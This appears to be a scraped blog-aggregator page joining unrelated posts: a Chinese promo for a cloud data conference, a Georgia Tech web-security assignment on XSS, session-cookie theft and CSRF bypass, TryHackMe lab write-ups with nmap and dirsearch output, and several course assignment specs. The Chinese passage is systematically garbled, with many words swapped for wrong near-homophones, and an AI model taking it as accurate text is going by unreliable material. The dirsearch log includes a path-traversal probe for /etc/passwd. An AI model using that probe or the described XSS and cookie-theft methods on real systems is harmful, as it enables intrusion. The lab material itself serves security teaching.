随着云计算、大数据、人工智能和实体经济的深度交融,数据已被看作新时代的"石油",正在成为当下企业倒退的根底也是影响寰球竞争的要害战略性资源。往年 4 月,"数据"更是作为新型生产因素被写入中央文件,成为国家竞争力的要害。把握更多数据资源,具备更强数据处理能力、剖析能力能力在新一轮的全球化商业竞争中占据主导地位。 在这样的大趋势下,企业如何降级数据驱动型企业进步业务敏捷性、如何借助数据驱动云上翻新、如何突破数据孤岛并借助开源凋谢生态疾速搭建能力平台,这些都是数据时代现代化企业所面临的挑战。 面对以上困局,亚马逊云科技基于多年来在助力企业翻新方面的丰盛实际和成绩,将在 10 月 28 日下午 14:00 为咱们带来一场以“数据驱动翻新”为主题的重磅峰会。 作为业内极具影响力的年度盛会,本次 INNOVATE 翻新大会由寰球云计算引领者亚马逊云科技主办,主题为“数据驱动翻新”,将聚焦云、数据及AI畛域,借助数据驱动云上翻新,突破数据孤岛,为企业生态单干及“数据驱动翻新”提供更多助力。 此次 INNOVATE|“数据驱动翻新”大会上,来自亚马逊云计算、大数据畛域的近30位专家大咖,将携手 Anker 安克翻新、船奇科技、OPPO、随锐团体、App Annie、字节跳动、Tableau、Kyligence 等多家行业先锋,独特就数字经济时代的数据架构现代化、数据交融及数据价值开掘等相干议题开展精彩探讨,从“道”与“术”两个层面,分享构建数据驱动型企业的办法与实际。 同时,大会还将有资深产品和技术专家分享如何借助人工智能帮忙企业实现业务翻新及产业转型,开掘数据价值助力企业降本增效,深刻解析典型业务场景及相干解决方案的展现,如用 AI 和 ML 施展数据价值,打造智能利用,实现业务改革等。 INNOVATE 翻新大会亮点 一、现代化数据策略三部曲 二、智能湖仓让数据自在流通 三、全栈式服务激活商业翻新后劲 「数据重塑业务价值 云技术助力数据驱动型企业实现“数据驱动翻新” 云上专门构建数据库:构建现代化利用的最佳抉择 云上全栈式数据分析引擎驱动重塑浪潮 数据交融开释价值 人工智能驱动翻新」 INNOVATE 翻新大会会议流程 本次大会包含“数据重塑业务价值”的主题演讲及 6 个分会场。主题演讲局部,将有亚马逊云科技大中华区产品部总经理顾凡及特邀嘉宾安克翻新数智化业务高级总监左鑫、船长 BI 大数据总监廖子洋及 OPPO 数智工程事业部总裁刘海锋独特带来精彩演讲。每个分会场也将各设 5-6 个议题,届时共 30 多位行业首领资深大咖将轮流献上业余分享,敬请期待! 来亚马逊云科技 INNOVATE|“数据驱动翻新”大会,和行业革新者一起,谋数为先,摸索云时代数据驱动带来的翻新将来。 10 月 28 日 下午 14:00 亚马逊云科技“数据驱动翻新”大会 扫描下方二维码 报名参会

October 19, 2021 · 1 min · jiezi

关于安全:GT-CS-6262-网络安全

GT CS 6262: Network SecurityProject 3 : Advanced WebSecurityFall 2021The latest Chrome browser is highly recommended for this projectObjectives Attack a web application by exploiting its XSS vulnerabilities to infect its users as persistently aspossible.Exploiting the XSS to launch a social engineering attack to trick a simulated user to give up itscredentials.Understand cookie management and how to secure your cookies.Understand the concepts of Same Origin Policy (SOP), Cross Origin Resource Sharing (CORS), andContent Security Policy (CSP).Report the frontend vulnerabilities.Due DatePlease refer to the Canvas assignment for how to submit your solution and due date.You will only have 10 chances to submit your solution onto GradeScope.BackgroundAs a student of CS6262, you are invited to join the web security club. This club has an official websitefor sharing information and resources. As a prospective member, you need to deliver a pentestingreport on the website and provide patches on what you find as a qualification test first.The website is not complicated. It is a simple Content Management System with several featuresenabled, e.g. text search, dark mode, rich text editor, etc.The website is https://cs6262.gtisc.gatech.edu. It integrates the GT Single Sign On service, so pleasesign in with your GT account and it will create a user for you.Before getting your hands dirtyLet’s first have a feel of what the website looks like. When you type cs6262.gtisc.gatech.edu in yourbrowser (the latest Chrome is recommended), the image below is what you will get. It has two postsintroducing its features. In the following instructions, you will be guided through the whole project.GT CS 6262: Network SecuritySign in first.a. Click “Sign in”, the blue button on the top right corner. It will redirect you to Georgia Tech’slogin page.b. After sign-in, you will be directed to the homepage. At the top right corner, you can see yourusername and a dropdown list, which means you have successfully logged in. Read thepost of “Dark Mode Goes Live” to figure out how to use the theme feature.You should read through all the existing posts to find clues of how to exploit the XSS vulnerabilitiesof the website.The “My writeups” tab will only return your submissions which can be used to see your submittedposts for task 4.The “Console” tab is the testing tab that will help you simulate other users and admins, receivingmessages. And one task also resides in that page. This is useful when you need others to click onGT CS 6262: Network Securityyour links.a. Message Receiver Endpointi. This section gives you an endpoint to send/receive messages. That is necessary forXSS attacks. Attackers usually steal cookies and send them to their endpoints. Youshould use the “POST” method to send messages to this endpoint. To view thereceived messages, click the link and refresh when you need to receive a new one.ii. This endpoint will be used for task 4 and task 5.b. The User/Admin instances running status tells the current running admin role and userroles. You can at most create one admin role and one user role.In order to trigger an XSS attack on the admin side, fill in the URL of your post and submit tothe admin role. It will create or override the current running browser instance, whichmeans when it’s messed up, you can submit a URL to override the current one.In order to trigger an XSS attack on other users’ sides, fill in the URL of your maliciouspayload. The user instances also override the current one when you submit new URLs.The admin instance will be used for task 4 and task 5.2. The user instance will be usedfor task 5.3.c. The ReDoS section lets you practice application layer DoS.i. The server is a simple username and password verification website. Your passwordshould not contain the username, the whole string. When you are able to launchthe ReDoS attack, another request to this page will not respond as it should in a veryGT CS 6262: Network Securityshort time interval. When your attack succeeds, you should be able to see a hashstring in the result area. Note that the hash string is correct only when it is under aReDoS attack.ii. Bear in mind that toggle the ReDoS heartbeat when you see a hash string so youcan copy and paste. Because the result is refreshed every 10 seconds.iii. Check “Restart the ReDoS instance” to launch the ReDoS server again when you feellike the server is not responding to your submission.d. The Information Theft section will show an input box when you are able to login as anadmin. As a regular user, you won’t be able to see this form. So, there are two approachesto access this form. However, it might be easier to go for approach 2.Here are the two approaches.i. Login as admin by stealing admin’s session cookie. Unfortunately, the sessioncookie is protected by the httpOnly flag which makes it invisible to JS. You may findother ways to steal this cookie. But, our server is well configured to prevent this.ii. Post your username and submit the form directly as admin. The form is protectedby CSRF. Think of ways to find out the endpoint to submit to, read the CSRF tokenand send the post request.Tasks and Grading RubricNote: Fill up the questionnaire and submit required files onto GradeScope.Task 1. Basic HTML and JavaScript Test (5%)In this section we will introduce a few basic HTML and JavaScript knowledge to help youwith other tasks. It is for practice purposes. There will be no points in this section.1.1 DevToolsModern browsers will provide DevTools for frontend developers to debug and tune theperformance when developing a website. It can also be used by attackers to explore andcollect information. Try pressing F12 in the Chrome browser. DevTools will popup. Here youcan run javascript in the console, view the source html of the webpage, and capture thenetwork traffic. It provides many functionalities. Try to explore it by yourself.1.2 console.log()console.log() is commonly used to print information into the console of the developer toolsfor debugging purposes. Open the devTool and type console.log(“yourGTID”); You can seeyour GTID is printed in the console.GT CS 6262: Network Security1.3 setIntervalsetInterval is used to fire a function given a frequency. It will return an intervalID which canbe passed to clearInterval to cancel the interval.Question: Given a variable var counter = 5, make use of setInterval and clearInterval toreduce the counter to 0 in every second and then stop. You can run your code in devToolsto verify.var counter = 5;// Your code below1.4 setTimeoutsetTimeout will fire a function after the delay milliseconds. The function will only be firedonce. Similarly you can use the returned timeoutID and clearTimeout to cancel the timeout.Question: Given a variable var counter = 5, make use of setTimeout to reduce the counterto 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below1.5 PromiseA Promise is an object used for async operations in JavaScript. There are three states in aPromise object: Pending, Fulfilled, and Rejected. Once created, the state of the Promiseobject is pending. So the calling function will not be blocked and continue executing. ThePromise object will eventually be fulfilled or rejected. Then the respective resolve or rejectfunction will be called. Below is an example of a Promise. Before running the code, can youtell what the output would be? Can you explain why?let testPromise = new Promise((resolve, reject) => {setTimeout(()=>resolve("Promise resolved"), 1000);})testPromise.then(message => {console.log(message);})console.log("Calling function");In this section we will ask you 5 questions related to HTML and javascript. Eachquestion contributes 1% of the total score. Please fill in your answers in theprovided questionnaire.2.1 B) C) D) All of aboveGT CS 6262: Network Security2.2 In order for the tag to open a new tab/window when clicked, what value shouldyou set for the target attribute? (The answer should only contain the value itself). This isnecessary for task 5.3.2.3 You will see three alerts after running the code below. Put the output in sequence. Theanswer should be 3 numbers separated by commas with no space, e.g. 1,1,1. Thinkabout why that is the case. You will use this technique in task 5.2.for (var i = 0; i < 3; i++) {const promise = new Promise((resolve, reject) => {setTimeout(resolve, 1000 + i*1000)});promise.then(() => alert(i));}2.4 Which of the following can set jsScript as a string variable correctly? Understandinghow HTML code is parsed is important. This question is related to task 3.A)B) 'C)D) None of above2.5 fetch is an api which makes use of promises to send web requests. It is supported bymost major web browsers. Study the use of fetch api and try to make a POST request toyour Message Receiver Endpoint with the payload body being {username:your-GT-username}, e.g. {username: abc123}. Then, check your message receiverendpoint again to see the response. It will be a hash string. Copy this string into thequestionnaire.Task 2. Exploit the Reflected-XSS (8%)Find where to exploit a reflected XSS and fill in the questionnaire a URL by visiting which an alertshould trigger.Concept ReviewReflective XSS is an attack where a website does not return requested data in a safe manner.Reflective is generally an XSS attack where the attacker sends the victim a link to a reputablewebsite. BUT, this link contains malicious javascript code. For example,https://www.facebook.com/logi...If the website returns the data in an unsafe manner (does not sanitize the output) and the victimclicks on this link, then the malicious code will be executed in the context of the victim’s session.RequirementsThe content of the alert doesn’t matter. For example,https://cs6262.gtisc.gatech.e... is what you need to fill in thequestionnaire.GT CS 6262: Network SecurityThe autograder will visit your URL, If it detects an alert, then you will receive full credit.TipsYou don’t need to log into the website to find this vulnerable point and exploit it.All inputs are malicious! Look for where you can type and try it with some alerts.DeliverablesA URL which includes the vulnerable endpoint and your alert payload.The alert should show the domain as below.RubricYour URL is able to trigger an alert 8%Your URL fails to trigger an alert 0%Task 3. Evolve to Persistent Client Side XSS (12%)After finding the exploitable place from task 2, you understand you can infect others by sendingthem links. But sending links is costly and people may not click on them every time.Therefore, instead of sending a link required in task 2, you find you can actually modify thepayload and let the payload live in this web app forever. As long as a user clicks on the link yousend once, she is infected persistently unless the payload is cleared.Concept ReviewAfter learning some types of XSS, you may think how I can make my attack as persistent aspossible on the client's side if the website doesn’t have a Stored-XSS vulnerability exposed toregular users.As Web technology evolves, more and more applications start to focus on user experience. Moreand more web applications, including cross platform Electron applications, are taking overdesktop applications. Some user's non-sensitive data is now stored on the client side, especiallythe look and feel preferences of an application, to let the App load faster by remembering theuser's preferences without passing back small data chunks.You can learn more how prevalent this is nowadays by reading the paper Don't Trust The Locals:Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the WildThen, the variable is read by an unsafe sink, e.g. eval, element.innerHTML(data).Inspect what is stored locally for the web application, cs6262.gtisc.gatech.edu, and how it isused.Tools you may need:F12 on the keyboard and go to Application tab to inspect the Storage as highlighted belowGT CS 6262: Network Security-The Application tab provides you with a quick look at what local data is stored. Thatincludes local storage, cookies, etc.The Sources tab provides you with static resources, like scripts, html, and CSS files. That isthe place you should focus on debugging JS code.RequirementsNow, modify the payload in the link from task 2 and fill the updated URL in the questionnaire.The autograder will first visit your URL to trigger your XSS payload to run. Then, it would close thepage and reopen, refresh. So, it should detect the alert twice. It should not pop up an alert by onlyvisiting your URL.TipsRead the post “Dark Mode” on the website.You may need to log into the website to find the vulnerable point and exploit it. More detailsare described on the website.The vulnerability is exploitable even if the victim has not logged in.In this task, you don’t need to submit a post yet, which is for task 4.The default dark mode style sheet is"https://bootswatch.com/4/cyborg/bootstrap.min.css". You can reset it if you feel thewebsite is messed up. Or, you can go to the Application tab->Application->Storage->Clearsite data to reset everything.FAQYour URL should NOT trigger any alerts when visiting it directly. And, you don’t need totrigger your payload to execute. The autograder will do that for you. This task is trying NOTto draw the user’s attention (e.g. popups, alerts, and theme changing) when the user clickson your URL. The alerts afterwards are for grading purposes.If your payload doesn’t work when you think it should, you can inspect the HTML element itcreates and see if there’s anything incomplete. Look for where it is consumed. You can seta debugger to step through the execution. https://www.w3schools.com/js/...may give a hint for those who cannot fix the syntax error of your payload.Remember to leverage task 2's result to inject your payload. When the page reloads, yourpayload can be read and executed.DeliverablesA URL which includes the vulnerable endpoint and your malicious payload.GT CS 6262: Network SecurityRubricYour URL is able to trigger an alert after reopen 6%Your URL is able to trigger an alert after refresh 6%Task 4. Exploit the Stored-XSS (20%)The website, https://cs6262.gtisc.gatech.edu, allows users to create articles. As a user, oneneeds to submit the post to a moderator who is the admin of the website for approval. This mightbe an interesting point to investigate whether you can inject something so when the admin isreviewing your post, thereby you can hijack the admin’s login session. This website uses a rich texteditor which not only enables styled content, but sanitizes the user's input while preserving itsstyle.In this task, you will submit a post with an injected payload that launches XSS attached to anadmin user. Then, you need to steal some information that is only visible to an admin.Concept ReviewStored XSS is an attack where a website does not store data in a safe manner. An attacker couldthen store malicious code within the website's database. Said code could be executed whenever auser visits that website. So, a post for an admin’s approval seems like something you will beinterested in. If you can steal the admin’s login session cookie, you can login as her to see whatshe can see.Recall from the lecture that when a cookie has httpOnly, it is not exposed to the document object.That is to say, this cookie is not accessible to JavaScript. What would you need to do to readinformation out as the cookie’s owner?This httpOnly flag is a good way to prevent JavaScript from reading sensitive cookies. However, itdoesn’t mean it can mitigate XSS attacks. Attackers, having malicious scripts running in thevictim’s browser, are still able to send requests and forward the responses to themselves.Even though the website is protected by CSRF tokens, attackers can still manage to postmalicious payload pretending to be the user.RequirementsExploit the rich text editor to inject another XSS payload. Such payloads should NOT triggeran alert for a successful exploit. Your payload SHOULD set a global variablewindow.gotYou=true for the autograder to read.You will steal admin’s cookies such that you can login as admin to generate your uniquehash string. Or, if you cannot steal the session cookie, you need to find a workaround to getthe hash still. You will need to use the Message Receiver Endpoint to receive the stoleninformation.Please DO NOT put any comments in your final code submission.Please put a semicolon at the end of each statement.WorkflowLog into the website with your own credentials.Inspect your session cookie to check if it has httpOnly set.a. If not, an XSS payload can steal it, so you can log into the website as another one.b. If yes, you need to find another way to get the hash.Create a new post and find the vulnerable point of the editor. The editor has two modes.GT CS 6262: Network Securitya. “What you see is what you got” mode. Try to type in some inputs and see how theeditor deals with it.

October 19, 2021 · 13 min · jiezi

关于安全:TryhackmeCyborg密码破解brog仓库析出文件sudo滥用可执行文件传参

服务发现┌──(rootkali)-[~/tryhackme/Cyborg]└─# nmap -sV -Pn 10.10.56.66Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 10:32 EDTNmap scan report for 10.10.56.66Host is up (0.31s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 45.80 seconds爆破目录┌──(rootkali)-[~/tryhackme/dirsearch]└─# python3 dirsearch.py -u http://10.10.56.66 -e* _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak HTTP method: GET | Threads: 30 | Wordlist size: 15492Output File: /root/tryhackme/dirsearch/reports/10.10.56.66/_21-10-09_10-55-20.txtError Log: /root/tryhackme/dirsearch/logs/errors-21-10-09_10-55-20.logTarget: http://10.10.56.66/[10:55:21] Starting: [10:55:28] 400 - 302B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [10:55:35] 403 - 275B - /.ht_wsr.txt [10:56:08] 301 - 308B - /admin -> http://10.10.56.66/admin/ [10:56:10] 200 - 6KB - /admin/ [10:56:11] 403 - 275B - /admin/.htaccess [10:56:11] 200 - 6KB - /admin/?/login [10:56:11] 200 - 5KB - /admin/admin.html [10:56:14] 200 - 6KB - /admin/ [10:57:18] 301 - 306B - /etc -> http://10.10.56.66/etc/ [10:57:18] 200 - 925B - /etc/ [10:57:31] 200 - 11KB - /index.html [10:58:14] 403 - 275B - /server-status [10:58:14] 403 - 275B - /server-status/ 在http://10.10.56.66/etc/squid/passwd找到一个登陆凭证 ...

October 18, 2021 · 3 min · jiezi

关于安全:COMS3200-UDP协议难点

Part C (50 marks)The RUSH protocol (Reliable UDP Substitute for HTTP) is a HTTP-like stop-and-wait protocol that uses UDPin conjunction with the RDT rules. You have recently been hired by the multinational tech giant COMS3200 Inc,who have identified your deep knowledge in the field of transport-layer protocols. The CEO of COMS3200 Inc, DanKim, has asked you to develop a network server capable of sending RUSH messages to a client. It is expected thatthe RUSH protocol is able to handle packet corruption and loss according to the RDT rules. Your server programmust be written in Python, Java, C, or C++.ASIDE: The RUSH protocol is not a real networking protocol and has been created purely for this assignmentProgram InvocationYour program should be able to be invoked from a UNIX command line as follows. It is expected that any Pythonprograms can run with version 3.6, and any Java programs can run with version 8.Pythonpython3 assign2.pyC/C++make./assign2Javamakejava Assign2RUSH Packet StructureA RUSH packet can be expressed as the following structure (|| is concatenation):IP-header || UDP-header || RUSH-header || payloadThe data segment of the packet is a string of ASCII plaintext. Single RUSH packets must be no longer than 1500bytes, including the IP and UDP headers (i.e. the maximum length of the data section is 1466 bytes). Packets thatare smaller than 1500 bytes should be padded with 0 bits up to that size. The following table describes the headerstructure of an RUSH packet:Bit 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 150 Sequence Number16 Acknowledgement Number32 Flags Reserved (should be 0)The following sections describe each header in this packet further.3Sequence and Acknowledgement NumbersSequence numbers are independently maintained by the client and server. The first packet sent by either endpointshould have a sequence number of 1, and subsequent packets should have a sequence number of 1 higher than theprevious packet (note that unlike TCP, RUSH sequence numbers are based on the number of packets as opposedto the number of bytes). When the ACK flag is set, the acknowledgement number should contain the sequencenumber of the packet that is being acknowledged. When a packet is retransmitted, it should use the originalsequence number of the packet being retransmitted. Any packet that isn’t a retransmission (including NAKs)should increment the sequence number.FlagsThe Flags section of the header is broken down into the following:Bit 0 1 2 3 40 ACK NAK GET DAT FINThe purpose of these flags is described in the example below.RUSH ExampleThe following situation describes a simple RUSH communication session. Square brackets denote the flags that areset in each step (for example [FIN/ACK] denotes the FIN and ACK flags having the value 1 and the rest havingthe value 0). Note that RUSH, unlike TCP, is not connection-oriented. There is no handshake to initialise theconnection, but there is one to close the connection. ...

October 18, 2021 · 7 min · jiezi

关于安全:安全CSRF-XSS

Cross-Site Request Forgery 跨站申请伪造攻击者借助受害者的cookie骗取服务器信赖 攻击者结构某个接口的申请参数,诱导用户点击或者用非凡形式让此申请主动执行,用户在登录状态下这个申请被服务端接管后被误认为是用户非法操作 进攻形式token验证referer验证Cross-Site Scripting 跨站脚本攻打原理产生的本源:将不受信赖的用户内容间接拼接在html(或js、css)文档中。当 这个内容通过精心结构后,本来应该被解释成内容的局部被浏览器解释成脚本执行,从而达到执行攻击者逻辑的目标。分类存储型> 将用户数据保留在服务端,具备很强的稳定性>> e.g. 博客、评论反射型非长久型XSS 往往须要黑客诱使点击歹意链接失效 DOM常见攻打目标cookie劫持:攻击者盗取cookie,伪装成用户操作网站钓鱼:利用用户对以后拜访网站的信赖,在以后拜访网站页面弹出或插入输入框让用户输出账号密码并发送到攻击者的服务器联结csrf进行攻打:伪装成用户向网站发送申请进攻形式输出端进行检查和解决(编码、本义、过滤) 存在的问题: 扭转用户输出的语义(原为富文本,须要保留html标签)编码本义后字符与输出不统一,引起后端校验规定和存储长度限度规定不统一的问题输入端进行检查和解决 存在的问题:内容可能在多处应用,容易有疏漏

October 11, 2021 · 1 min · jiezi

关于安全:CSE-220

CSE 220: Systems Fundamentals IStony Brook UniversityProgramming Project #2Spring 2019Assignment Due: Friday, March 15, 2019 by 11:59 pmLearning OutcomesAfter completion of this programming project you should be able to: Read and write strings of arbitrary length. Implement non-trivial algorithms that require conditional execution and iteration. Design and code functions that implement the MIPS assembly register conventions.Getting StartedVisit Piazza and download the file proj2.zip. Decompress the file and then open proj2.zip. Fill in thefollowing information at the top of proj2.asm: ...

October 10, 2021 · 24 min · jiezi

关于安全:TryhackmeLooking-Glass维吉利亚加解密敏感文件权限sudo滥用

服务发现┌──(rootkali)-[~/tryhackme]└─# nmap -sV -Pn 10.10.189.27 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 04:11 EDTNmap scan report for 10.10.163.86Host is up (1.1s latency).Not shown: 916 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)9000/tcp open ssh Dropbear sshd (protocol 2.0)9001/tcp open ssh Dropbear sshd (protocol 2.0)9002/tcp open ssh Dropbear sshd (protocol 2.0)9003/tcp open ssh Dropbear sshd (protocol 2.0)9009/tcp open ssh Dropbear sshd (protocol 2.0)9010/tcp open ssh Dropbear sshd (protocol 2.0)9011/tcp open ssh Dropbear sshd (protocol 2.0)9040/tcp open ssh Dropbear sshd (protocol 2.0)9050/tcp open ssh Dropbear sshd (protocol 2.0)9071/tcp open ssh Dropbear sshd (protocol 2.0)9080/tcp open ssh Dropbear sshd (protocol 2.0)9081/tcp open ssh Dropbear sshd (protocol 2.0)9090/tcp open ssh Dropbear sshd (protocol 2.0)9091/tcp open ssh Dropbear sshd (protocol 2.0)9099/tcp open ssh Dropbear sshd (protocol 2.0)9100/tcp open jetdirect?9101/tcp open jetdirect?9102/tcp open jetdirect?9103/tcp open jetdirect?9110/tcp open ssh Dropbear sshd (protocol 2.0)9111/tcp open ssh Dropbear sshd (protocol 2.0)9200/tcp open ssh Dropbear sshd (protocol 2.0)9207/tcp open ssh Dropbear sshd (protocol 2.0)9220/tcp open ssh Dropbear sshd (protocol 2.0)9290/tcp open ssh Dropbear sshd (protocol 2.0)9415/tcp open ssh Dropbear sshd (protocol 2.0)9418/tcp open ssh Dropbear sshd (protocol 2.0)9485/tcp open ssh Dropbear sshd (protocol 2.0)9500/tcp open ssh Dropbear sshd (protocol 2.0)9502/tcp open ssh Dropbear sshd (protocol 2.0)9503/tcp open ssh Dropbear sshd (protocol 2.0)9535/tcp open ssh Dropbear sshd (protocol 2.0)9575/tcp open ssh Dropbear sshd (protocol 2.0)9593/tcp open ssh Dropbear sshd (protocol 2.0)9594/tcp open ssh Dropbear sshd (protocol 2.0)9595/tcp open ssh Dropbear sshd (protocol 2.0)9618/tcp open ssh Dropbear sshd (protocol 2.0)9666/tcp open ssh Dropbear sshd (protocol 2.0)9876/tcp open ssh Dropbear sshd (protocol 2.0)9877/tcp open ssh Dropbear sshd (protocol 2.0)9878/tcp open ssh Dropbear sshd (protocol 2.0)9898/tcp open ssh Dropbear sshd (protocol 2.0)9900/tcp open ssh Dropbear sshd (protocol 2.0)9917/tcp open ssh Dropbear sshd (protocol 2.0)9929/tcp open ssh Dropbear sshd (protocol 2.0)9943/tcp open ssh Dropbear sshd (protocol 2.0)9944/tcp open ssh Dropbear sshd (protocol 2.0)9968/tcp open ssh Dropbear sshd (protocol 2.0)9998/tcp open ssh Dropbear sshd (protocol 2.0)9999/tcp open ssh Dropbear sshd (protocol 2.0)10000/tcp open ssh Dropbear sshd (protocol 2.0)10001/tcp open ssh Dropbear sshd (protocol 2.0)10002/tcp open ssh Dropbear sshd (protocol 2.0)10003/tcp open ssh Dropbear sshd (protocol 2.0)10004/tcp open ssh Dropbear sshd (protocol 2.0)10009/tcp open ssh Dropbear sshd (protocol 2.0)10010/tcp open ssh Dropbear sshd (protocol 2.0)10012/tcp open ssh Dropbear sshd (protocol 2.0)10024/tcp open ssh Dropbear sshd (protocol 2.0)10025/tcp open ssh Dropbear sshd (protocol 2.0)10082/tcp open ssh Dropbear sshd (protocol 2.0)10180/tcp open ssh Dropbear sshd (protocol 2.0)10215/tcp open ssh Dropbear sshd (protocol 2.0)10243/tcp open ssh Dropbear sshd (protocol 2.0)10566/tcp open ssh Dropbear sshd (protocol 2.0)10616/tcp open ssh Dropbear sshd (protocol 2.0)10617/tcp open ssh Dropbear sshd (protocol 2.0)10621/tcp open ssh Dropbear sshd (protocol 2.0)10626/tcp open ssh Dropbear sshd (protocol 2.0)10628/tcp open ssh Dropbear sshd (protocol 2.0)10629/tcp open ssh Dropbear sshd (protocol 2.0)10778/tcp open ssh Dropbear sshd (protocol 2.0)11110/tcp open ssh Dropbear sshd (protocol 2.0)11111/tcp open ssh Dropbear sshd (protocol 2.0)11967/tcp open ssh Dropbear sshd (protocol 2.0)12000/tcp open ssh Dropbear sshd (protocol 2.0)12174/tcp open ssh Dropbear sshd (protocol 2.0)12265/tcp open ssh Dropbear sshd (protocol 2.0)12345/tcp open ssh Dropbear sshd (protocol 2.0)13456/tcp open ssh Dropbear sshd (protocol 2.0)13722/tcp open ssh Dropbear sshd (protocol 2.0)13782/tcp open ssh Dropbear sshd (protocol 2.0)13783/tcp open ssh Dropbear sshd (protocol 2.0)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel太操蛋了。。。看上去开了很多ssh端口,开启-p-从新扫了一次,扫描出更多ssh端口 ...

October 9, 2021 · 8 min · jiezi

关于安全:Windows-11恶意软件减少60REvil后门激怒合作方|10月8日全球网络安全热点

1.微软宣称Windows 11将恶意软件缩小了60% 微软示意,Windows 11具备旨在通过应用硬件隔离、无明码身份验证和云平安等技术来爱护用户免受在线攻打的性能。这就是该公司示意新的Windows 11更新能够将恶意软件缩小60%的起因。 自Windows 10于2015年公布以来,Windows 11更新始终是微软操作系统最大的变动之一。随着整个操作系统从零碎主题、内置应用程序甚至蓝屏死机中取得全新的外观(BSOD)承受从新设计后,用户肯定会留神到操作系统的变动。另一方面,微软还对Windows 11更新进行了许多底层更改,进步了性能和安全性,并宣称Windows 11更新联合了多项性能,可将测试设施上的恶意软件缩小60%。 新闻来源:https://tech.hindustantimes.c... 2.REvil后门的发现激怒了其合作方 在过来一年中,REvil勒索软件波及多起备受瞩目的攻打,现已成为网络安全妇孺皆知的名字。它是规模最大且常常被索取的勒索软件即服务(ransomware-as-a-service)业务之一,但因为心怀不满的前客户泄露了代码,表明该组织能够为本人的客户提供后门,因而它可能会失去一些业务。 代码显示,地方REvil组可能间接复原从属机构加密的文件,还能够劫持聊天会话,将受害者的付款发送给他们本人而不是从属机构。 钻研表明,REvil至多曾多次与其从属公司的受害者机密进行这些平行聊天。如果他们与受害者达成领取协定,REvil在原始聊天中伪装成受害者并通知从属机构他们回绝领取。在某些状况下,从属公司甚至基本没有意识到他们被坑骗了。 新闻来源:https://www.cpomagazine.com/c... 3.FontOnLake:一个针对Linux的恶意软件家族 钻研人员发现了一个以前未知的恶意软件家族,它利用自定义和精心设计的模块,针对运行Linux的零碎。这个恶意软件家族应用的模块,被称为FontOnLake,该恶意软件始终在开发中,为操作员提供近程拜访,收集凭据,并充当代理服务器。 为了收集数据(例如ssh凭据)或进行其余歹意流动,该恶意软件系列应用通过调整的通过批改的非法二进制文件以加载更多组件。事实上,为了暗藏它的存在,FontOnLake的存在总是随同着一个rootkit。这些二进制文件(例如cat、kill或sshd)通常用于Linux零碎,并且还能够用作持久性机制。 FontOnLake目前已知的组件能够分为以下三组互相交互: 特洛伊木马应用程序——批改后的非法二进制文件,通过调整以加载更多组件、收集数据或进行其余歹意流动。后门–用户模式组件作为其运营商的次要通信点。Rootkit–内核模式组件,次要暗藏和假装它们的存在、帮助更新或提供后备后门。 新闻来源:https://www.welivesecurity.co... 4.黑客在航空航天、电信公司应用荫蔽的ShellClient恶意软件 考察用于针对航空航天和电信行业公司的恶意软件的威逼钻研人员发现了一个新的威逼行为者,该行为者至多自2018年以来始终在发展网络间谍活动。 该恶意软件被称为ShellClient,是一种以前未记录在案的近程拜访木马(RAT),专一于荫蔽和“高度针对性的网络间谍活动”。 钻研人员将ShellClient归因于MalKamak,MalKamak是一个以前未公开的威逼行为者,将其用于侦察口头和从中东、美国、俄罗斯和欧洲的指标窃取敏感数据。 新闻来源:https://www.bleepingcomputer....

October 9, 2021 · 1 min · jiezi

关于安全:ST300-Assessed

ST300 Assessed CourseworkBody Measurements1 QuestionThe data-set body.dat contains 21 body dimension measurements, togetherwith age, weight, height, and gender on 507 individuals. The 247 men and260 women were primarily individuals in their twenties and thirties, with ascattering of older men and women, all exercising several hours a week.The main aim is to explain how the height of an individual is related toother variables. Using R (other packages not allowed), obtain a satisfactorymodel for height in terms of the other variables. You should examine outliersand influential observations, and try transformations. You may also want totry variable selections using techniques learnt and used in your lectures andworkshops. Why is your model good? From your model, what can yousay about the relationship between the height and other body measurementsor characteristics of a particular individual? Which body measurement(s)are potentially more important in estimating a person’s height? Write asummary of your analysis with no more than 6 sides of A4 (includinggraphs and figures).Variable descriptions:Skeletal Measurements: (all in cm)biacromial Biacromial diameterpelvic.breadth Biiliac diameter, or "pelvic breadth"bitrochanteric Bitrochanteric diameter, in cmchest.depth Chest depth between spine and sternum at nipple level,mid-expirationchest.diam Chest diameter at nipple level, mid-expirationelbow.diam Elbow diameter, sum of two elbowswrist.diam Wrist diameter, sum of two wristsknee.diam Knee diameter, sum of two kneesankle.diam Ankle diameter, sum of two anklesFebruary 11, 2019 ST300 1Week 15Girth Measurements: (all in cm)shoulder.girth Shoulder girth over deltoid muscleschest.girth Chest girth, nipple line in males and just above breasttissue in females, mid-expirationwaist.girth Waist girth, narrowest part of torso below the rib cage,average of contracted and relaxed positionnavel.girth Navel (or "Abdominal") girth at umbilicus and iliac crest,iliac crest as a landmarkhip.girth Hip girth at level of bitrochanteric diameterthigh.girth Thigh girth below gluteal fold, average of right and leftgirthsbicep.girth Bicep girth, flexed, average of right and left girthsforearm.girth Forearm girth, extended, palm up, average of right andleft girthsknee.girth Knee girth over patella, slightly flexed position, averageof right and left girthscalf.girth Calf maximum girth, average of right and left girthsankle.girth Ankle minimum girth, average of right and left girthswrist.girth Wrist minimum girth, average of right and left girthsOther Measurements:age Age (years)weight Weight (kg)height Height (cm)gender Gender (1 - male, 0 - female)Note: 